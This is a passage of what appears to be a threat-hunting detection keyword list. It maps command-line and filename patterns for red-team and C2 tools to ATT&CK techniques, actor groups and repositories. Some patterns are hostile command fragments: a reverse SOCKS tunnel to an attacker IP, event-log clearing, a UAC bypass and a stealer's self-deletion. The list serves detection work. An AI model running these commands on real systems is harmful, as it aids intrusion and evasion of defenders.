*,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,0,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -*-cli install github *Apollo.*,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,0,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*-cli payload start *,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,0,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -*click_to_exploit.docx*,offensive_tool_keyword,POC,Just another PoC for the new MSDT-Exploit,T1190 - T1203 - T1068 - T1210,TA0001 - TA0002 - TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/drgreenthumb93/CVE-2022-30190-follina,1,1,N/A,N/A,1,10,4,2023-04-20T20:34:05Z,2022-06-01T11:37:08Z -*clickjack_attack.html*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*clickjack_victim.html*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*clickme*exploit.html*,offensive_tool_keyword,POC,CVE-2022-30190 Follina POC,T1190 - T1203 - T1068 - T1210,TA0001 - TA0002 - TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/onecloudemoji/CVE-2022-30190,1,1,N/A,N/A,2,107,33,2022-05-31T09:35:37Z,2022-05-31T06:45:25Z -*client $ATTACKER-IP:$ATTACKER-PORT R:$PORT:socks*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*client.py --server-ip * --server-port *,offensive_tool_keyword,rpivot,socks4 reverse proxy for penetration testing,T1090.004 - T1572 - T1021.001,TA0011 - TA0002 - TA0040,N/A,N/A,C2,https://github.com/klsecservices/rpivot,1,0,N/A,10,10,490,125,2018-07-12T09:53:13Z,2016-09-07T17:25:57Z -*client.py*--domain*--hashes*,offensive_tool_keyword,rpivot,socks4 reverse proxy for penetration testing,T1090.004 - T1572 - T1021.001,TA0011 - TA0002 - TA0040,N/A,N/A,C2,https://github.com/klsecservices/rpivot,1,0,N/A,10,10,490,125,2018-07-12T09:53:13Z,2016-09-07T17:25:57Z -*ClipboardImplant*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*clipboardinject.*,offensive_tool_keyword,cobaltstrike,Cobaltstrike Bofs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*clipboardinject.x64*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - 
T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*clipboardinject.x86*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*clipboard-monitor 
*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*ClipboardWindow-Inject*,offensive_tool_keyword,cobaltstrike,CLIPBRDWNDCLASS process injection technique(BOF) - execute beacon shellcode in callback,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/BronzeTicket/ClipboardWindow-Inject,1,1,N/A,10,10,58,11,2022-09-15T01:41:39Z,2022-09-14T15:55:06Z -*clipmon.sln*,offensive_tool_keyword,cobaltstrike,Cobaltstrike addons to interact with 
clipboard,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/DallasFR/Cobalt-Clip,1,1,N/A,10,,N/A,,, -*cloakify*,offensive_tool_keyword,cloakify,CloakifyFactory & the Cloakify Toolset - Data Exfiltration & Infiltration In Plain Sight. Evade DLP/MLS Devices. Social Engineering of Analysts. Defeat Data Whitelisting Controls. Evade AV Detection. Text-based steganography using lists. Convert any file type (e.g. executables. Office. Zip. images) into a list of everyday strings. Very simple tools. powerful concept. limited only by your imagination.,T1001 - T1003 - T1027 - T1036 - T1048 - T1052,TA0010,N/A,N/A,Data Exfiltration,https://github.com/TryCatchHCF/Cloakify,1,0,N/A,N/A,10,1440,233,2020-11-24T05:25:04Z,2016-05-07T04:52:26Z -*CloakNDaggerC2-main*,offensive_tool_keyword,CloakNDaggerC2,A C2 framework designed around the use of public/private RSA key pairs to sign and authenticate commands being executed. 
This prevents MiTM interception of calls and ensures opsec during delicate operations.,T1090 - T1090.003 - T1071 - T1071.001 - T1553 - T1553.002,TA0011 - TA0042 - TA0003,N/A,N/A,C2,https://github.com/matt-culbert/CloakNDaggerC2,1,1,N/A,10,10,4,2,2023-10-02T19:54:24Z,2023-04-28T01:58:18Z -*cloc.exe --exclude-dir*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1027 - T1055 - T1070 - T1112 - T1140,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,0,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*cloud_enum-master.zip*,offensive_tool_keyword,cloud_enum,Multi-cloud OSINT tool. Enumerate public resources in AWS Azure and Google Cloud.,T1596,TA0043,N/A,N/A,Reconnaissance,https://github.com/initstring/cloud_enum,1,1,N/A,6,10,1238,199,2023-07-31T07:27:37Z,2019-05-31T09:14:05Z -*cloudfail.py --target seo.com --tor*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*cloudFilterEOP.exe*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*cloudmapper collect --account parent --profile parent*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*cloudmapper configure add-account --config-file config.json --name parent --id XXX --default true*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*cloudmapper configure discover-organization-accounts*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*cloudsplaining create-multi-account-config-file -o accounts.yml*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - 
TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*cloudsplaining download --profile someprofile*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*cloudsplaining scan --input-file default.json*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*cloudsplaining scan-multi-account -c accounts.yml -r TargetRole --output-directory ./*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*cloudsplaining scan-policy-file --input-file examples/policies/wildcards.json*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*cloudsploit *,offensive_tool_keyword,cloudsploit,CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud 
infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. These scripts are designed to return a series of potential misconfigurations and security risks.,T1526 - T1534 - T1547 - T1078 - T1046,TA0002 - TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/aquasecurity/cloudsploit,1,0,N/A,N/A,10,2921,641,2023-09-29T16:35:48Z,2015-06-29T15:33:40Z -*cloudsploit*cloudtrail*,offensive_tool_keyword,cloudsploit,CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. These scripts are designed to return a series of potential misconfigurations and security risks.,T1526 - T1534 - T1547 - T1078 - T1046,TA0002 - TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/aquasecurity/cloudsploit,1,1,N/A,N/A,10,2921,641,2023-09-29T16:35:48Z,2015-06-29T15:33:40Z -*cloudsploit/index.js*,offensive_tool_keyword,cloudsploit,CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. These scripts are designed to return a series of potential misconfigurations and security risks.,T1526 - T1534 - T1547 - T1078 - T1046,TA0002 - TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/aquasecurity/cloudsploit,1,1,N/A,N/A,10,2921,641,2023-09-29T16:35:48Z,2015-06-29T15:33:40Z -*cloudsploit/scans*,offensive_tool_keyword,cloudsploit,CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. 
These scripts are designed to return a series of potential misconfigurations and security risks.,T1526 - T1534 - T1547 - T1078 - T1046,TA0002 - TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/aquasecurity/cloudsploit,1,1,N/A,N/A,10,2921,641,2023-09-29T16:35:48Z,2015-06-29T15:33:40Z -*CloudSploitSupplemental*,offensive_tool_keyword,cloudsploit,CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. These scripts are designed to return a series of potential misconfigurations and security risks.,T1526 - T1534 - T1547 - T1078 - T1046,TA0002 - TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/aquasecurity/cloudsploit,1,1,N/A,N/A,10,2921,641,2023-09-29T16:35:48Z,2015-06-29T15:33:40Z -*cloudtrail__csv_injection*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,0,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*clr2of8/GatherContacts*,offensive_tool_keyword,GatherContacts,A Burp Suite Extension to pull Employee Names from Google and Bing LinkedIn Search Results.As part of reconnaissance when performing a penetration test. it is often useful to gather employee names that can then be massaged into email addresses and usernames. The usernames may come in handy for performing a password spraying attack for example. 
One easy way to gather employee names is to use the following Burp Suite Pro extension as described below.,T1593 - T1533 - T1087,TA0043 - TA0002,N/A,N/A,Information Gathering,https://github.com/clr2of8/GatherContacts,1,1,N/A,N/A,2,169,44,2022-08-27T13:28:08Z,2018-03-29T14:46:14Z -*cmbndhnoonmghfofefkcccljbkdpamhi_14678.crx*,offensive_tool_keyword,hack-tools,The all-in-one Red Team browser extension for Web Pentester,T1059.007 - T1505 - T1068 - T1216 - T1547.009,TA0002 - TA0001 - TA0009,N/A,N/A,Web Attacks,https://github.com/LasCC/Hack-Tools,1,1,N/A,9,10,5006,586,2023-10-03T15:40:37Z,2020-06-22T21:42:16Z -*cmd /c * --bypass-uac*,offensive_tool_keyword,RunasCs,RunasCs - Csharp and open version of windows builtin runas.exe,T1059.003 - T1059.001 - T1035,TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/antonioCoco/RunasCs/,1,0,N/A,6,8,722,107,2023-05-20T01:19:52Z,2019-08-08T20:18:18Z -*cmd /c * --remote-impersonation*,offensive_tool_keyword,RunasCs,RunasCs - Csharp and open version of windows builtin runas.exe,T1059.003 - T1059.001 - T1035,TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/antonioCoco/RunasCs/,1,0,N/A,6,8,722,107,2023-05-20T01:19:52Z,2019-08-08T20:18:18Z -*cmd /c *if exist *.txt echo ImHere*,offensive_tool_keyword,smbmap,SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. 
and is intended to simplify searching for potentially sensitive data across large networks.,T1210.001 - T1083 - T1213 - T1021,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Information Gathering,https://github.com/ShawnDEvans/smbmap,1,0,N/A,10,10,1554,344,2023-09-14T20:51:52Z,2015-03-16T13:15:00Z -*cmd /c mklink /d * HarddiskVolumeShadowCopy1*,offensive_tool_keyword,evil-winrm,This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.,T1021 - T1028 - T1046 - T1078 - T1091 - T1219,TA0003 - TA0008 - TA0009,N/A,N/A,Exploitation tools,https://github.com/Hackplayers/evil-winrm,1,0,N/A,10,10,3760,566,2023-06-09T07:42:42Z,2019-05-28T10:53:00Z -*cmd /c whoami* bypass*,offensive_tool_keyword,SharpToken,SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them,T1134 - T1101 - T1214 - T1087 - T1038,TA0004 - TA0007,N/A,N/A,Exploitation tools,https://github.com/BeichenDream/SharpToken,1,0,N/A,N/A,4,353,47,2023-04-11T13:29:23Z,2022-06-30T07:34:57Z -*cmd smb *-u*-p*,offensive_tool_keyword,crackmapexec,crackmapexec command lines. 
CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*cmd* wevtutil.exe cl *,greyware_tool_keyword,wevtutil,adversaries can delete specific event logs or clear their contents. erasing potentially valuable information that could aid in detection. incident response. or forensic investigations. This tactic aims to hinder forensic analysis efforts and make it more challenging for defenders to reconstruct the timeline of events or identify malicious activities.,T1070.004 - T1562.001,TA0005 - TA0040,N/A,N/A,Defense Evasion,N/A,1,0,greyware tool - risks of False positive !,10,10,N/A,N/A,N/A,N/A -*cmd*echo*\pipe\*,greyware_tool_keyword,echo,Detects the use of getsystem Meterpreter/Cobalt Strike command. 
Getsystem is used to elevate privilege to SYSTEM account,T1068.003 - T1078.002,TA0004 - TA0008,N/A,N/A,Exploitation Tools,https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_meterpreter_or_cobaltstrike_getsystem_service_start.yml,1,0,greyware tool - risks of False positive !,N/A,10,6749,1943,2023-10-03T04:55:17Z,2016-12-24T09:48:49Z -*cmd.exe /S /D /c* echo 123,greyware_tool_keyword,echo,Adversaries may attempt to test echo command after exploitation,T1059.001 - T1059.003,TA0002 - TA0006,N/A,N/A,Defense Evasion,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*cmd.exe /c *echo test > C:\Users\Public\test.txt*,offensive_tool_keyword,NimExec,Fileless Command Execution for Lateral Movement in Nim,T1021.006 - T1059.005 - T1564.001,TA0008 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/frkngksl/NimExec,1,0,N/A,N/A,4,307,33,2023-06-23T11:07:20Z,2023-04-21T19:46:53Z -*cmd.exe /c chcp >&2*,greyware_tool_keyword,chcp,chcp displays the number of the active console code page,T1059 - T1027,TA0002 - TA0009,N/A,N/A,Discovery,https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*cmd.exe /c echo * > \\.\pipe\*,greyware_tool_keyword,echo,Named pipe impersonation,T1134.002 - T1055 - T1548.002,TA0004 - TA0003 - TA0002,N/A,N/A,Privilege Escalation,https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/,1,0,N/A,7,10,N/A,N/A,N/A,N/A -*cmd.exe /c rundll32.exe agressor.dll*stealth*,offensive_tool_keyword,mortar,red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. 
Mortar is able to bypass modern anti-virus products and advanced XDR solutions,T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562,TA0002 - TA0003 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/0xsp-SRD/mortar,1,0,N/A,N/A,10,1181,193,2022-08-03T03:38:57Z,2021-11-25T16:49:47Z -*cmd.exe /c sc start plumber*,offensive_tool_keyword,elevationstation,elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative,T1548.002 - T1055 - T1574.002 - T1078.003,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/g3tsyst3m/elevationstation,1,0,N/A,N/A,3,271,33,2023-08-17T02:45:17Z,2023-06-10T03:30:59Z -*cmd.exe /c timeout /t 5 & del /f /q *%s* & exit*,offensive_tool_keyword,mars stealer,Self-removal 'mars stealer' command,T1587,TA0002,mars stealer,,Malware,https://3xp0rt.com/posts/mars-stealer,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*cmd.exe /C wmic /node:* /user:* /password:* os get caption*,greyware_tool_keyword,wmic,gather information about Windows OS version and licensing on the hosts,T1047 - T1016 - T1082,TA0007 - TA0002 - 